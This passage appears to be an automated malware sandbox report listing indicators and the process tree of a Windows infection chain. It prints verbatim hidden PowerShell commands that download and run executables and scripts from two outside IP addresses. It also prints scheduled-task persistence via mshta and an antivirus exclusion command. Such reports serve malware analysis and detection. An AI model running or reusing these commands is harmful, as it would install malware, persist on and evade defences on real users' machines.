3736	ktxzLhN.exe
3736	ktxzLhN.exe
3828	dll32.exe

Suspicious use of AdjustPrivilegeToken 54 IoCs

description	pid	Process
Token: SeDebugPrivilege	1100	powershell.exe
Token: SeDebugPrivilege	1616	ce4pMzk.exe
Token: SeDebugPrivilege	2156	powershell.exe
Token: SeDebugPrivilege	2392	powershell.exe
Token: SeDebugPrivilege	2228	powershell.exe
Token: SeDebugPrivilege	3008	powershell.exe
Token: SeDebugPrivilege	1976	powershell.exe
Token: SeDebugPrivilege	1740	powershell.exe
Token: SeDebugPrivilege	2724	powershell.exe
Token: SeDebugPrivilege	1524	ktxzLhN.exe
Token: SeDebugPrivilege	1564	dll32.exe
Token: SeDebugPrivilege	2916	777e11d160.exe
Token: SeDebugPrivilege	2092	tasklist.exe
Token: SeDebugPrivilege	2688	tasklist.exe
Token: SeDebugPrivilege	1176	tasklist.exe
Token: SeDebugPrivilege	2676	tasklist.exe
Token: SeDebugPrivilege	1996	tasklist.exe
Token: SeDebugPrivilege	2120	tasklist.exe
Token: SeDebugPrivilege	1660	tasklist.exe
Token: SeDebugPrivilege	2392	tasklist.exe
Token: SeDebugPrivilege	2268	tasklist.exe
Token: SeDebugPrivilege	2976	tasklist.exe
Token: SeDebugPrivilege	1040	tasklist.exe
Token: SeDebugPrivilege	2356	tasklist.exe
Token: SeDebugPrivilege	1508	tasklist.exe
Token: SeDebugPrivilege	3008	tasklist.exe
Token: SeDebugPrivilege	1700	tasklist.exe
Token: SeDebugPrivilege	1084	tasklist.exe
Token: SeDebugPrivilege	2528	tasklist.exe
Token: SeDebugPrivilege	2180	taskkill.exe
Token: SeDebugPrivilege	2468	tasklist.exe
Token: SeDebugPrivilege	1220	tasklist.exe
Token: SeDebugPrivilege	2156	taskkill.exe
Token: SeDebugPrivilege	2448	tasklist.exe
Token: SeDebugPrivilege	2904	taskkill.exe
Token: SeDebugPrivilege	2596	taskkill.exe
Token: SeDebugPrivilege	792	taskkill.exe
Token: SeDebugPrivilege	1676	firefox.exe
Token: SeDebugPrivilege	1676	firefox.exe
Token: SeDebugPrivilege	396	tasklist.exe
Token: SeDebugPrivilege	3132	tasklist.exe
Token: SeDebugPrivilege	3304	tasklist.exe
Token: SeDebugPrivilege	3508	tasklist.exe
Token: SeDebugPrivilege	3560	tasklist.exe
Token: SeDebugPrivilege	3356	80a506a4b9.exe
Token: SeDebugPrivilege	3644	tasklist.exe
Token: SeDebugPrivilege	3760	tasklist.exe
Token: SeDebugPrivilege	3736	ktxzLhN.exe
Token: SeDebugPrivilege	3828	dll32.exe
Token: SeDebugPrivilege	3880	tasklist.exe
Token: SeDebugPrivilege	3936	tasklist.exe
Token: SeDebugPrivilege	3996	tasklist.exe
Token: SeDebugPrivilege	4072	tasklist.exe
Token: SeDebugPrivilege	3132	tasklist.exe

Suspicious use of FindShellTrayWindow 21 IoCs

pid	Process
2328	f77181c378ba4bd9a7c5a8bf5f4c2c159af00fd81493d740c4c0d405b1902a7c.exe
2328	f77181c378ba4bd9a7c5a8bf5f4c2c159af00fd81493d740c4c0d405b1902a7c.exe
2328	f77181c378ba4bd9a7c5a8bf5f4c2c159af00fd81493d740c4c0d405b1902a7c.exe
2852	TempJICSAQQTO1AS3W9KG6TJQRLWTFDJOXXR.EXE
848	68271cbb99.exe
848	68271cbb99.exe
848	68271cbb99.exe
956	a9c3a998e8.exe
956	a9c3a998e8.exe
956	a9c3a998e8.exe
956	a9c3a998e8.exe
956	a9c3a998e8.exe
956	a9c3a998e8.exe
1676	firefox.exe
1676	firefox.exe
1676	firefox.exe
1676	firefox.exe
956	a9c3a998e8.exe
956	a9c3a998e8.exe
956	a9c3a998e8.exe
956	a9c3a998e8.exe

Suspicious use of SendNotifyMessage 19 IoCs

pid	Process
2328	f77181c378ba4bd9a7c5a8bf5f4c2c159af00fd81493d740c4c0d405b1902a7c.exe
2328	f77181c378ba4bd9a7c5a8bf5f4c2c159af00fd81493d740c4c0d405b1902a7c.exe
2328	f77181c378ba4bd9a7c5a8bf5f4c2c159af00fd81493d740c4c0d405b1902a7c.exe
848	68271cbb99.exe
848	68271cbb99.exe
848	68271cbb99.exe
956	a9c3a998e8.exe
956	a9c3a998e8.exe
956	a9c3a998e8.exe
956	a9c3a998e8.exe
956	a9c3a998e8.exe
956	a9c3a998e8.exe
1676	firefox.exe
1676	firefox.exe
1676	firefox.exe
956	a9c3a998e8.exe
956	a9c3a998e8.exe
956	a9c3a998e8.exe
956	a9c3a998e8.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2328 wrote to memory of 2212	2328	f77181c378ba4bd9a7c5a8bf5f4c2c159af00fd81493d740c4c0d405b1902a7c.exe	30
PID 2328 wrote to memory of 2212	2328	f77181c378ba4bd9a7c5a8bf5f4c2c159af00fd81493d740c4c0d405b1902a7c.exe	30
PID 2328 wrote to memory of 2212	2328	f77181c378ba4bd9a7c5a8bf5f4c2c159af00fd81493d740c4c0d405b1902a7c.exe	30
PID 2328 wrote to memory of 2212	2328	f77181c378ba4bd9a7c5a8bf5f4c2c159af00fd81493d740c4c0d405b1902a7c.exe	30
PID 2328 wrote to memory of 2220	2328	f77181c378ba4bd9a7c5a8bf5f4c2c159af00fd81493d740c4c0d405b1902a7c.exe	31
PID 2328 wrote to memory of 2220	2328	f77181c378ba4bd9a7c5a8bf5f4c2c159af00fd81493d740c4c0d405b1902a7c.exe	31
PID 2328 wrote to memory of 2220	2328	f77181c378ba4bd9a7c5a8bf5f4c2c159af00fd81493d740c4c0d405b1902a7c.exe	31
PID 2328 wrote to memory of 2220	2328	f77181c378ba4bd9a7c5a8bf5f4c2c159af00fd81493d740c4c0d405b1902a7c.exe	31
PID 2212 wrote to memory of 2084	2212	cmd.exe	33
PID 2212 wrote to memory of 2084	2212	cmd.exe	33
PID 2212 wrote to memory of 2084	2212	cmd.exe	33
PID 2212 wrote to memory of 2084	2212	cmd.exe	33
PID 2220 wrote to memory of 1100	2220	mshta.exe	34
PID 2220 wrote to memory of 1100	2220	mshta.exe	34
PID 2220 wrote to memory of 1100	2220	mshta.exe	34
PID 2220 wrote to memory of 1100	2220	mshta.exe	34
PID 1100 wrote to memory of 2852	1100	powershell.exe	37
PID 1100 wrote to memory of 2852	1100	powershell.exe	37
PID 1100 wrote to memory of 2852	1100	powershell.exe	37
PID 1100 wrote to memory of 2852	1100	powershell.exe	37
PID 2852 wrote to memory of 2144	2852	TempJICSAQQTO1AS3W9KG6TJQRLWTFDJOXXR.EXE	38
PID 2852 wrote to memory of 2144	2852	TempJICSAQQTO1AS3W9KG6TJQRLWTFDJOXXR.EXE	38
PID 2852 wrote to memory of 2144	2852	TempJICSAQQTO1AS3W9KG6TJQRLWTFDJOXXR.EXE	38
PID 2852 wrote to memory of 2144	2852	TempJICSAQQTO1AS3W9KG6TJQRLWTFDJOXXR.EXE	38
PID 2144 wrote to memory of 1616	2144	rapes.exe	40
PID 2144 wrote to memory of 1616	2144	rapes.exe	40
PID 2144 wrote to memory of 1616	2144	rapes.exe	40
PID 2144 wrote to memory of 1616	2144	rapes.exe	40
PID 2144 wrote to memory of 848	2144	rapes.exe	41
PID 2144 wrote to memory of 848	2144	rapes.exe	41
PID 2144 wrote to memory of 848	2144	rapes.exe	41
PID 2144 wrote to memory of 848	2144	rapes.exe	41
PID 848 wrote to memory of 1096	848	68271cbb99.exe	42
PID 848 wrote to memory of 1096	848	68271cbb99.exe	42
PID 848 wrote to memory of 1096	848	68271cbb99.exe	42
PID 848 wrote to memory of 1096	848	68271cbb99.exe	42
PID 848 wrote to memory of 2608	848	68271cbb99.exe	43
PID 848 wrote to memory of 2608	848	68271cbb99.exe	43
PID 848 wrote to memory of 2608	848	68271cbb99.exe	43
PID 848 wrote to memory of 2608	848	68271cbb99.exe	43
PID 1096 wrote to memory of 840	1096	cmd.exe	45
PID 1096 wrote to memory of 840	1096	cmd.exe	45
PID 1096 wrote to memory of 840	1096	cmd.exe	45
PID 1096 wrote to memory of 840	1096	cmd.exe	45
PID 2608 wrote to memory of 2156	2608	mshta.exe	46
PID 2608 wrote to memory of 2156	2608	mshta.exe	46
PID 2608 wrote to memory of 2156	2608	mshta.exe	46
PID 2608 wrote to memory of 2156	2608	mshta.exe	46
PID 2156 wrote to memory of 1464	2156	powershell.exe	48
PID 2156 wrote to memory of 1464	2156	powershell.exe	48
PID 2156 wrote to memory of 1464	2156	powershell.exe	48
PID 2156 wrote to memory of 1464	2156	powershell.exe	48
PID 2144 wrote to memory of 268	2144	rapes.exe	49
PID 2144 wrote to memory of 268	2144	rapes.exe	49
PID 2144 wrote to memory of 268	2144	rapes.exe	49
PID 2144 wrote to memory of 268	2144	rapes.exe	49
PID 268 wrote to memory of 2016	268	cmd.exe	51
PID 268 wrote to memory of 2016	268	cmd.exe	51
PID 268 wrote to memory of 2016	268	cmd.exe	51
PID 268 wrote to memory of 2016	268	cmd.exe	51
PID 268 wrote to memory of 1604	268	cmd.exe	52
PID 268 wrote to memory of 1604	268	cmd.exe	52
PID 268 wrote to memory of 1604	268	cmd.exe	52
PID 268 wrote to memory of 1604	268	cmd.exe	52

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\f77181c378ba4bd9a7c5a8bf5f4c2c159af00fd81493d740c4c0d405b1902a7c.exe
"C:\Users\Admin\AppData\Local\Temp\f77181c378ba4bd9a7c5a8bf5f4c2c159af00fd81493d740c4c0d405b1902a7c.exe"
1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2328
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c schtasks /create /tn LbktqmaHN2A /tr "mshta C:\Users\Admin\AppData\Local\Temp\HzIVJTpkb.hta" /sc minute /mo 25 /ru "Admin" /f
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2212
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /tn LbktqmaHN2A /tr "mshta C:\Users\Admin\AppData\Local\Temp\HzIVJTpkb.hta" /sc minute /mo 25 /ru "Admin" /f
    3⤵
    - System Location Discovery: System Language Discovery
    - Scheduled Task/Job: Scheduled Task
    PID:2084
- C:\Windows\SysWOW64\mshta.exe
  mshta C:\Users\Admin\AppData\Local\Temp\HzIVJTpkb.hta
  2⤵
  - System Location Discovery: System Language Discovery
  - Modifies Internet Explorer settings
  - Suspicious use of WriteProcessMemory
  PID:2220
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'JICSAQQTO1AS3W9KG6TJQRLWTFDJOXXR.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Downloads MZ/PE file
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:1100
  - - C:\Users\Admin\AppData\Local\TempJICSAQQTO1AS3W9KG6TJQRLWTFDJOXXR.EXE
      "C:\Users\Admin\AppData\Local\TempJICSAQQTO1AS3W9KG6TJQRLWTFDJOXXR.EXE"
      4⤵
      Identifies VirtualBox via ACPI registry values (likely anti-VM)
      Checks BIOS information in registry
      Executes dropped EXE
      Identifies Wine through registry keys
      Loads dropped DLL
      Suspicious use of NtSetInformationThreadHideFromDebugger
      Drops file in Windows directory
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of FindShellTrayWindow
      Suspicious use of WriteProcessMemory
      PID:2852
    - - C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
        
        "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
        5⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Downloads MZ/PE file
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Loads dropped DLL
        Adds Run key to start application
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        
        PID:2144
      - C:\Users\Admin\AppData\Local\Temp\10104900101\ce4pMzk.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10104900101\ce4pMzk.exe"
        6⤵
        Executes dropped EXE
        Adds Run key to start application
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1616
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Local\Caches\pDcYrl4C\Anubis.exe""
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2724
      - C:\Users\Admin\AppData\Local\Temp\10106670101\68271cbb99.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10106670101\68271cbb99.exe"
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        Suspicious use of WriteProcessMemory
        
        PID:848
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c schtasks /create /tn F0EW1macdZW /tr "mshta C:\Users\Admin\AppData\Local\Temp\Rr9g4HhLm.hta" /sc minute /mo 25 /ru "Admin" /f
        7⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:1096
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /tn F0EW1macdZW /tr "mshta C:\Users\Admin\AppData\Local\Temp\Rr9g4HhLm.hta" /sc minute /mo 25 /ru "Admin" /f
        8⤵
        System Location Discovery: System Language Discovery
        Scheduled Task/Job: Scheduled Task
        
        PID:840
        
        C:\Windows\SysWOW64\mshta.exe
        
        mshta C:\Users\Admin\AppData\Local\Temp\Rr9g4HhLm.hta
        7⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:2608
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'ZCF5TUPWYXNMBBTBGT0A7S5I6NNLTUKI.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
        8⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Downloads MZ/PE file
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:2156
        
        C:\Users\Admin\AppData\Local\TempZCF5TUPWYXNMBBTBGT0A7S5I6NNLTUKI.EXE
        
        "C:\Users\Admin\AppData\Local\TempZCF5TUPWYXNMBBTBGT0A7S5I6NNLTUKI.EXE"
        9⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious behavior: EnumeratesProcesses
        
        PID:1464
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\10106680121\am_no.cmd" "
        6⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:268
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 2
        7⤵
        System Location Discovery: System Language Discovery
        Delays execution with timeout.exe
        
        PID:2016
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:1604
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
        8⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        
        PID:2520
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:2420
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
        8⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2392
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:2468
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
        8⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2228
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /tn "fFWMJmaUaQB" /tr "mshta \"C:\Temp\dGUhPFzXc.hta\"" /sc minute /mo 25 /ru "Admin" /f
        7⤵
        System Location Discovery: System Language Discovery
        Scheduled Task/Job: Scheduled Task
        
        PID:2812
        
        C:\Windows\SysWOW64\mshta.exe
        
        mshta "C:\Temp\dGUhPFzXc.hta"
        7⤵
        System Location Discovery: System Language Discovery
        Modifies Internet Explorer settings
        
        PID:2888
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
        8⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Downloads MZ/PE file
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3008
        
        C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
        9⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious behavior: EnumeratesProcesses
        
        PID:1532
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\10106761121\PcAIvJ0.cmd"
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:2800
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "& {Invoke-WebRequest -Uri 'http://45.144.212.77:16000/setup' -OutFile 'C:\Users\Admin\AppData\Local\Temp\installer.ps1'; Start-Process 'powershell.exe' -ArgumentList '-ExecutionPolicy Bypass -NoProfile -File \"C:\Users\Admin\AppData\Local\Temp\installer.ps1\"' -WindowStyle Hidden}"
        7⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1976
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoProfile -File "C:\Users\Admin\AppData\Local\Temp\installer.ps1"
        8⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1740
      - C:\Users\Admin\AppData\Local\Temp\10106910101\ktxzLhN.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10106910101\ktxzLhN.exe"
        6⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1524
        
        C:\Users\Admin\AppData\Local\Temp\dll32.exe
        
        "C:\Users\Admin\AppData\Local\Temp\dll32.exe"
        7⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1564
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmp88B0.tmp.bat & Del C:\Users\Admin\AppData\Local\Temp\tmp88B0.tmp.bat
        8⤵
        
        PID:2460
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        9⤵
        
        PID:2228
        
        C:\Windows\system32\tasklist.exe
        
        Tasklist /fi "PID eq 1564"
        9⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:2092
        
        C:\Windows\system32\find.exe
        
        find ":"
        9⤵
        
        PID:2236
        
        C:\Windows\system32\timeout.exe
        
        Timeout /T 1 /Nobreak
        9⤵
        Delays execution with timeout.exe
        
        PID:1240
        
        C:\Windows\system32\tasklist.exe
        
        Tasklist /fi "PID eq 1564"
        9⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:2688
        
        C:\Windows\system32\find.exe
        
        find ":"
        9⤵
        
        PID:2976
        
        C:\Windows\system32\timeout.exe
        
        Timeout /T 1 /Nobreak
        9⤵
        Delays execution with timeout.exe
        
        PID:2852
        
        C:\Windows\system32\tasklist.exe
        
        Tasklist /fi "PID eq 1564"
        9⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:1176
        
        C:\Windows\system32\find.exe
        
        find ":"
        9⤵
        
        PID:2776
        
        C:\Windows\system32\timeout.exe
        
        Timeout /T 1 /Nobreak
        9⤵
        Delays execution with timeout.exe
        
        PID:2404
        
        C:\Windows\system32\tasklist.exe
        
        Tasklist /fi "PID eq 1564"
        9⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:2676
        
        C:\Windows\system32\find.exe
        
        find ":"
        9⤵
        
        PID:1148
        
        C:\Windows\system32\timeout.exe
        
        Timeout /T 1 /Nobreak
        9⤵
        Delays execution with timeout.exe
        
        PID:1404
        
        C:\Windows\system32\tasklist.exe
        
        Tasklist /fi "PID eq 1564"
        9⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:1996
        
        C:\Windows\system32\find.exe
        
        find ":"
        9⤵
        
        PID:2208
        
        C:\Windows\system32\timeout.exe
        
        Timeout /T 1 /Nobreak
        9⤵
        Delays execution with timeout.exe
        
        PID:2524
        
        C:\Windows\system32\tasklist.exe
        
        Tasklist /fi "PID eq 1564"
        9⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:2120
        
        C:\Windows\system32\find.exe
        
        find ":"
        9⤵
        
        PID:920
        
        C:\Windows\system32\timeout.exe
        
        Timeout /T 1 /Nobreak
        9⤵
        Delays execution with timeout.exe
        
        PID:2568
        
        C:\Windows\system32\tasklist.exe
        
        Tasklist /fi "PID eq 1564"
        9⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:1660
        
        C:\Windows\system32\find.exe
        
        find ":"
        9⤵
        
        PID:2032
        
        C:\Windows\system32\timeout.exe
        
        Timeout /T 1 /Nobreak
        9⤵
        Delays execution with timeout.exe
        
        PID:2592
        
        C:\Windows\system32\tasklist.exe
        
        Tasklist /fi "PID eq 1564"
        9⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:2392
        
        C:\Windows\system32\find.exe
        
        find ":"
        9⤵
        
        PID:1716
        
        C:\Windows\system32\timeout.exe
        
        Timeout /T 1 /Nobreak
        9⤵
        Delays execution with timeout.exe
        
        PID:2260
        
        C:\Windows\system32\tasklist.exe
        
        Tasklist /fi "PID eq 1564"
        9⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:2268
        
        C:\Windows\system32\find.exe
        
        find ":"
        9⤵
        
        PID:2828
        
        C:\Windows\system32\timeout.exe
        
        Timeout /T 1 /Nobreak
        9⤵
        Delays execution with timeout.exe
        
        PID:3048
        
        C:\Windows\system32\tasklist.exe
        
        Tasklist /fi "PID eq 1564"
        9⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:2976
        
        C:\Windows\system32\find.exe
        
        find ":"
        9⤵
        
        PID:1860
        
        C:\Windows\system32\timeout.exe
        
        Timeout /T 1 /Nobreak
        9⤵
        Delays execution with timeout.exe
        
        PID:580
        
        C:\Windows\system32\tasklist.exe
        
        Tasklist /fi "PID eq 1564"
        9⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:1040
        
        C:\Windows\system32\find.exe
        
        find ":"
        9⤵
        
        PID:1780
        
        C:\Windows\system32\timeout.exe
        
        Timeout /T 1 /Nobreak
        9⤵
        Delays execution with timeout.exe
        
        PID:944
        
        C:\Windows\system32\tasklist.exe
        
        Tasklist /fi "PID eq 1564"
        9⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:2356
        
        C:\Windows\system32\find.exe
        
        find ":"
        9⤵
        
        PID:3052
        
        C:\Windows\system32\timeout.exe
        
        Timeout /T 1 /Nobreak
        9⤵
        Delays execution with timeout.exe
        
        PID:840
        
        C:\Windows\system32\tasklist.exe
        
        Tasklist /fi "PID eq 1564"
        9⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:1508
        
        C:\Windows\system32\find.exe
        
        find ":"
        9⤵
        
        PID:2912
        
        C:\Windows\system32\timeout.exe
        
        Timeout /T 1 /Nobreak
        9⤵
        Delays execution with timeout.exe
        
        PID:880
        
        C:\Windows\system32\tasklist.exe
        
        Tasklist /fi "PID eq 1564"
        9⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:3008
        
        C:\Windows\system32\find.exe
        
        find ":"
        9⤵
        
        PID:2500
        
        C:\Windows\system32\timeout.exe
        
        Timeout /T 1 /Nobreak
        9⤵
        Delays execution with timeout.exe
        
        PID:2192
        
        C:\Windows\system32\tasklist.exe
        
        Tasklist /fi "PID eq 1564"
        9⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:1700
        
        C:\Windows\system32\find.exe
        
        find ":"
        9⤵
        
        PID:836
        
        C:\Windows\system32\timeout.exe
        
        Timeout /T 1 /Nobreak
        9⤵
        Delays execution with timeout.exe
        
        PID:2628
        
        C:\Windows\system32\tasklist.exe
        
        Tasklist /fi "PID eq 1564"
        9⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:1084
        
        C:\Windows\system32\find.exe
        
        find ":"
        9⤵
        
        PID:1416
        
        C:\Windows\system32\timeout.exe
        
        Timeout /T 1 /Nobreak
        9⤵
        Delays execution with timeout.exe
        
        PID:2060
        
        C:\Windows\system32\tasklist.exe
        
        Tasklist /fi "PID eq 1564"
        9⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:2528
        
        C:\Windows\system32\find.exe
        
        find ":"
        9⤵
        
        PID:2012
        
        C:\Windows\system32\timeout.exe
        
        Timeout /T 1 /Nobreak
        9⤵
        Delays execution with timeout.exe
        
        PID:344
        
        C:\Windows\system32\tasklist.exe
        
        Tasklist /fi "PID eq 1564"
        9⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:2468
        
        C:\Windows\system32\find.exe
        
        find ":"
        9⤵
        
        PID:1716
        
        C:\Windows\system32\timeout.exe
        
        Timeout /T 1 /Nobreak
        9⤵
        Delays execution with timeout.exe
        
        PID:1504
        
        C:\Windows\system32\tasklist.exe
        
        Tasklist /fi "PID eq 1564"
        9⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:1220
        
        C:\Windows\system32\find.exe
        
        find ":"
        9⤵
        
        PID:1512
        
        C:\Windows\system32\timeout.exe
        
        Timeout /T 1 /Nobreak
        9⤵
        Delays execution with timeout.exe
        
        PID:1236
        
        C:\Windows\system32\tasklist.exe
        
        Tasklist /fi "PID eq 1564"
        9⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:2448
        
        C:\Windows\system32\find.exe
        
        find ":"
        9⤵
        
        PID:380
        
        C:\Windows\system32\timeout.exe
        
        Timeout /T 1 /Nobreak
        9⤵
        Delays execution with timeout.exe
        
        PID:2696
        
        C:\Windows\system32\tasklist.exe
        
        Tasklist /fi "PID eq 1564"
        9⤵
        Enumerates processes with tasklist
